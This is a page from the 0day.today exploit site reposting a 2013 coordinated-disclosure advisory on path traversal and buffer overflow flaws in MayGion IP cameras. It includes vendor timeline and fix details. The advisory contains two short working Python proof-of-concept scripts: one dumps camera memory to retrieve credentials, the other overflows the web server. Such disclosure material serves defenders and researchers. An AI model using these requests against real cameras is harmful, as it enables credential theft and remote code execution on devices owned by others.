0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MayGion IP Camera Path Traversal / Buffer Overflow
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
MayGion IP Cameras multiple vulnerabilities 1. *Advisory Information* Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: MayGion Release mode: Coordinated release 2. *Vulnerability Information* Class: Path traversal [CWE-22], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1604, CVE-2013-1605 3. *Vulnerability Description* Multiple vulnerabilities have been found in MayGion IP cameras [1] based on firmware v09.27 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials, 2. [CVE-2013-1605] to execute arbitrary code. 4. *Vulnerable Packages* . MayGion IP cameras based on firmware 2011.27.09. . Other firmware versions are probably affected too but they were not checked. 5. *Non-Vulnerable Packages* . H.264 ipcam firmware 2013.04.22. 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. 7. *Technical Description / Proof of Concept Code* 7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/../../../../../../../../../proc/kcore") resp = conn.getresponse() data = resp.read() conn.close() -----/ 7.2. *Buffer overflow* [CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/" + "A" * 3000 + ".html") resp = conn.getresponse() data = resp.read() conn.close() -----/ 8. *Report Timeline* . 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013. . 2013-05-02: Vendor asks for a report with technical information. . 2013-05-03: A draft advisory containing technical details sent to MayGion team. . 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013. . 2013-05-09: Core asks for a list of affected devices and firmware. No reply received. . 2013-05-28: Advisory CORE-2013-0322 is published. # 0day.today [2024-09-28] #